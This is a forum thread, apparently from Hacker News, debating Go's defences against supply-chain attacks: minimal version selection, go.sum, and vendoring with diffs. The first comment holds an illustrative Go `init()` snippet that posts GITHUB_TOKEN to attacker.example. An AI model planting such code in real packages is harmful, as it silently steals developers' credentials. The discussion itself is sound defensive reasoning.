gnfargbl | 6 hours ago
I'm a huge Go proponent, but I don't see much in Go's module system that would really prevent supply-chain attacks in practice. The Go maintainers point [1] at the strong dependency pinning approach, the sumdb system, and the module proxy as mitigations, and yes, those are good. However, I can't see what those features do to defend against an attack vector we have certainly seen elsewhere: a project gets compromised, releases a malicious version, and everyone picks it up the next time they run `go get -u ./...` without any further checking. I would say that is the workflow for a good chunk of actual users.

The lack of package install hooks does feel somewhat effective, but what's really to stop an attacker putting their malicious code in `func init() {}`? Compromising a popular and important project this way would likely be noticed pretty quickly. But compromising something widely used but boring? I feel like attackers could get away with that for weeks.

This isn't really a criticism of Go so much as an observation that depending on random strangers for code (and code updates) is fundamentally risky. Anyone got any good strategies for enforcing a dependency cooldown?
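To make the `func init()` point concrete, here's a hypothetical sketch (the package name and URL are made up, it's not code from any real project) of how a compromised dependency could act the moment it is imported, with no install hook at all:

```go
// Hypothetical sketch only: the package name and URL are invented. It just
// shows that `func init()` gives a compromised dependency a hook that runs in
// every importer, before main().
package innocentlooking

import (
	"net/http"
	"net/url"
	"os"
)

func init() {
	// Executes at program start in any binary that (transitively) imports
	// this package; no install-time hook is needed.
	go func() {
		// A real payload would be obfuscated; this only illustrates the timing.
		http.PostForm("https://attacker.example/collect",
			url.Values{"token": {os.Getenv("GITHUB_TOKEN")}})
	}()
}
```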
MatthiasDev | 2 hours ago | parent | next
A big thing is that Go does not install the latest version of transitive dependencies. Instead it uses minimal version selection (MVS), see https://go.dev/ref/mod#minimal-version-selection. I highly recommend reading the article by Russ Cox linked from that reference. This greatly decreases your chances of being hit by malware released after a package is taken over.

In Go, access to the OS and to process execution requires certain imports, and imports must appear at the beginning of the file; this helps when scanning for malicious code. Compare this with JavaScript, where one can call require("child_process") or import() at any point in the code.

Personally, I have started vendoring my dependencies with `go mod vendor` and diffing after dependency updates. In the end, you are responsible for the effects of your dependencies.
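As a rough illustration of the import point (just a sketch, not taken from any real project): spawning a process needs `os/exec` in the import block, so a simple scan of a file's imports already reveals the capability.

```go
// Minimal sketch: in Go, the ability to start a process is visible in the
// import block at the top of the file.
package demo

import "os/exec"

// runLs shells out to ls. It is unreachable without the os/exec import above,
// so scanning imports surfaces the capability; there is no analogue of
// JavaScript's require("child_process") buried deep in a function body.
func runLs() ([]byte, error) {
	return exec.Command("ls", "-l").Output()
}
```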
devttyeu | 5 hours ago | parent | prev | next
In Go you know exactly what code you're building thanks to `go.sum`, and it's much easier to audit changed code after upgrading: just create vendor dirs before and after updating packages and diff them; send the diff to an AI for basic screening if it's >100k LOC, and/or review it manually.

My projects are massive codebases with thousands of deps and >200MB stripped binaries of literally just code, and this is perfectly feasible. (And yes, I do catch stuff occasionally, though nothing actively adversarial so far.)

I don't believe I can do the same with Rust.
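For illustration, a rough sketch of that before/after loop, driving the usual commands from Go; the `vendor.before` scratch directory and the use of `cp`/`diff` are assumptions about a Unix-like setup, not part of any Go tooling.

```go
// Rough sketch of the before/after vendor diff described above, driven from Go
// purely for illustration. Assumes a Unix-like machine with cp and diff on
// PATH, and that it is run from the module root.
package main

import (
	"fmt"
	"os"
	"os/exec"
)

func run(name string, args ...string) error {
	cmd := exec.Command(name, args...)
	cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr
	return cmd.Run()
}

func must(err error) {
	if err != nil {
		fmt.Fprintln(os.Stderr, "step failed:", err)
		os.Exit(1)
	}
}

func main() {
	must(run("go", "mod", "vendor"))                 // vendor the current deps
	must(run("cp", "-r", "vendor", "vendor.before")) // snapshot them
	must(run("go", "get", "-u", "./..."))            // upgrade
	must(run("go", "mod", "tidy"))
	must(run("go", "mod", "vendor"))                 // re-vendor the upgraded deps

	// diff exits non-zero when the trees differ, so that is not treated as
	// fatal: its output is exactly the changed dependency code to review
	// (manually, or via whatever screening you use).
	if err := run("diff", "-ru", "vendor.before", "vendor"); err != nil {
		fmt.Fprintln(os.Stderr, "differences found, review the output above:", err)
	}
}
```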
PunchyHamster | 4 hours ago | parent | prev | next
> However, I can't see what those features do to defend against an attack vector we have certainly seen elsewhere: a project gets compromised, releases a malicious version, and everyone picks it up the next time they run `go get -u ./...` without any further checking. I would say that is the workflow for a good chunk of actual users.

You can't, really, aside from full-on code audits. By definition, if you trust a maintainer and they get compromised, you get compromised too.

Requiring GPG signing of releases (even just git commit signing) would help, but that's more work for people distributing their stuff, and inevitably someone will build an insecure but convenient way to automate it away from the developer.
asmor | 6 hours ago | parent | prev
The Go standard library is a lot more comprehensive and usable than Node's, so you need fewer dependencies to begin with.